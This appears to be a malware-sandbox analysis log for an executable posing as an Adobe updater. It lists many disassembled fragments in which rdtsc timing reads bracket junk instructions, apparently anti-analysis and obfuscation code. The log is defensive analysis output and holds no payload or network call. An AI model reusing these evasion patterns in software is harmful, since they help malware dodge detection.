Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC066E second address: 4EC068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3DAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC068E second address: 4EC069D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC069D second address: 4EC06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0BFE second address: 4EC0C7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F09D0731CACh 0x00000010 pushad 0x00000011 mov cx, DD57h 0x00000015 pushfd 0x00000016 jmp 00007F09D0731CACh 0x0000001b add ecx, 033181C8h 0x00000021 jmp 00007F09D0731CABh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F09D0731CB6h 0x00000030 mov eax, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F09D0731CB7h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0C7F second address: 4EC0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov edx, 67424446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and dword ptr [eax], 00000000h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F09D0D9C3E9h 0x00000019 jmp 00007F09D0D9C3DBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0CB8 second address: 4EC0CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ch, 21h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0F24 second address: 4EC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0F2A second address: 4EC0F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0F2E second address: 4EC0F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E7077E second address: 4E707A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F09D0731CAAh 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CAAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E707A1 second address: 4E707B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E707B0 second address: 4E707D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F09D0731CAEh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, 4Dh 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0C20 second address: 4ED0C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0C28 second address: 4ED0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F09D0731CB4h 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB1h 0x00000015 or ax, 1896h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 push eax 0x00000021 mov bx, DDD2h 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov dx, si 0x0000002c mov esi, 3760B1F7h 0x00000031 popad 0x00000032 mov eax, dword ptr [76FB65FCh] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F09D0731CB9h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0CA1 second address: 4ED0CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0CC7 second address: 4ED0D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42794930h 0x0000000f jmp 00007F09D0731CAEh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov si, 356Dh 0x0000001b jmp 00007F09D0731CAAh 0x00000020 popad 0x00000021 xor eax, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F09D0731CB3h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0D1C second address: 4ED0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED0D39 second address: 4ED0D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 7B18355Eh 0x00000014 call 00007F09D0731CAFh 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED019D second address: 4ED01A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED01A1 second address: 4ED01BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dh, ECh 0x0000000b pushad 0x0000000c mov cx, 2E2Fh 0x00000010 mov ecx, 37D27E4Bh 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED01BF second address: 4ED01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov ecx, 06CC50E9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4ED01D3 second address: 4ED01EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0731CB7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90056 second address: 4E900B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov di, 62FEh 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3DFh 0x00000017 sub ch, FFFFFFAEh 0x0000001a jmp 00007F09D0D9C3E9h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov ax, AF09h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push esi 0x0000002d jmp 00007F09D0D9C3DBh 0x00000032 pop ecx 0x00000033 popad 0x00000034 and esp, FFFFFFF8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E900B7 second address: 4E900BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E900BD second address: 4E9013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F09D0D9C3E6h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3E1h 0x00000017 and esi, 0E027956h 0x0000001d jmp 00007F09D0D9C3E1h 0x00000022 popfd 0x00000023 mov dx, ax 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 jmp 00007F09D0D9C3DAh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F09D0D9C3E0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E9013E second address: 4E90142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90142 second address: 4E90148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90148 second address: 4E901C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 call 00007F09D0731CB1h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F09D0731CB7h 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a movzx esi, bx 0x0000001d popad 0x0000001e mov ecx, ebx 0x00000020 popad 0x00000021 push esi 0x00000022 jmp 00007F09D0731CB2h 0x00000027 mov dword ptr [esp], esi 0x0000002a jmp 00007F09D0731CB0h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F09D0731CB7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E901C9 second address: 4E901FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F09D0D9C3E0h 0x0000000c or eax, 26D53E88h 0x00000012 jmp 00007F09D0D9C3DBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E901FC second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90200 second address: 4E90206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90206 second address: 4E9026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CABh 0x0000000f xchg eax, edi 0x00000010 jmp 00007F09D0731CB6h 0x00000015 test esi, esi 0x00000017 jmp 00007F09D0731CB0h 0x0000001c je 00007F0A427D0072h 0x00000022 jmp 00007F09D0731CB0h 0x00000027 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002e pushad 0x0000002f movzx eax, di 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E9026D second address: 4E902DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007F0A42E3A78Eh 0x0000000c jmp 00007F09D0D9C3DBh 0x00000011 mov edx, dword ptr [esi+44h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F09D0D9C3E4h 0x0000001b add ecx, 57B06338h 0x00000021 jmp 00007F09D0D9C3DBh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F09D0D9C3E6h 0x0000002f jmp 00007F09D0D9C3E5h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E902DE second address: 4E90311 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007F09D0731CB0h 0x00000016 or cx, 5F28h 0x0000001b jmp 00007F09D0731CABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90311 second address: 4E90317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90317 second address: 4E9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E9031B second address: 4E90370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E4h 0x00000018 and ah, FFFFFFB8h 0x0000001b jmp 00007F09D0D9C3DBh 0x00000020 popfd 0x00000021 mov ch, DCh 0x00000023 popad 0x00000024 jne 00007F0A42E3A704h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DEh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90370 second address: 4E90375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA001D second address: 4EA0023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0023 second address: 4EA0028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0028 second address: 4EA008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F09D0D9C3E4h 0x0000000f or ecx, 74C37A58h 0x00000015 jmp 00007F09D0D9C3DBh 0x0000001a popfd 0x0000001b mov cx, 230Fh 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F09D0D9C3E0h 0x00000028 jmp 00007F09D0D9C3E5h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA008A second address: 4EA00C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F09D0731CB6h 0x0000000e and esp, FFFFFFF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0731CB7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA00C5 second address: 4EA0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F09D0D9C3DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F09D0D9C3DEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0102 second address: 4EA0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0114 second address: 4EA0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F09D0D9C3E7h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0149 second address: 4EA014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA014F second address: 4EA0160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0160 second address: 4EA0183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0183 second address: 4EA0192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0192 second address: 4EA01F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 adc ecx, 16E55D06h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA01F0 second address: 4EA0203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0203 second address: 4EA0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FA31h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub ebx, ebx 0x0000000c pushad 0x0000000d jmp 00007F09D0731CB3h 0x00000012 mov ax, C47Fh 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F09D0731CB2h 0x0000001e je 00007F0A427B7DF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0248 second address: 4EA024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA024C second address: 4EA0252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0252 second address: 4EA0258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0258 second address: 4EA025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA025C second address: 4EA0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F09D0D9C3E6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0285 second address: 4EA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB1h 0x0000000c sub ax, 9BE6h 0x00000011 jmp 00007F09D0731CB1h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 pushfd 0x00000021 jmp 00007F09D0731CAFh 0x00000026 sub ah, 0000001Eh 0x00000029 jmp 00007F09D0731CB9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA02EB second address: 4EA0340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42E22479h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E3h 0x00000018 and al, FFFFFFDEh 0x0000001b jmp 00007F09D0D9C3E9h 0x00000020 popfd 0x00000021 mov esi, 6E44BCA7h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0340 second address: 4EA0374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FB6968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CB8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0374 second address: 4EA0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA0383 second address: 4EA042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dh, E4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0A427B7CCEh 0x00000011 pushad 0x00000012 mov eax, 75B27D5Fh 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F09D0731CAEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov edi, ecx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F09D0731CB8h 0x0000002d and al, 00000028h 0x00000030 jmp 00007F09D0731CABh 0x00000035 popfd 0x00000036 mov dh, ah 0x00000038 popad 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB0h 0x00000042 jmp 00007F09D0731CB5h 0x00000047 popfd 0x00000048 mov dx, ax 0x0000004b popad 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e mov edi, esi 0x00000050 jmp 00007F09D0731CB4h 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA042C second address: 4EA0449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA04BE second address: 4EA04D2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 5C306ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edi 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EA04D2 second address: 4EA04D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
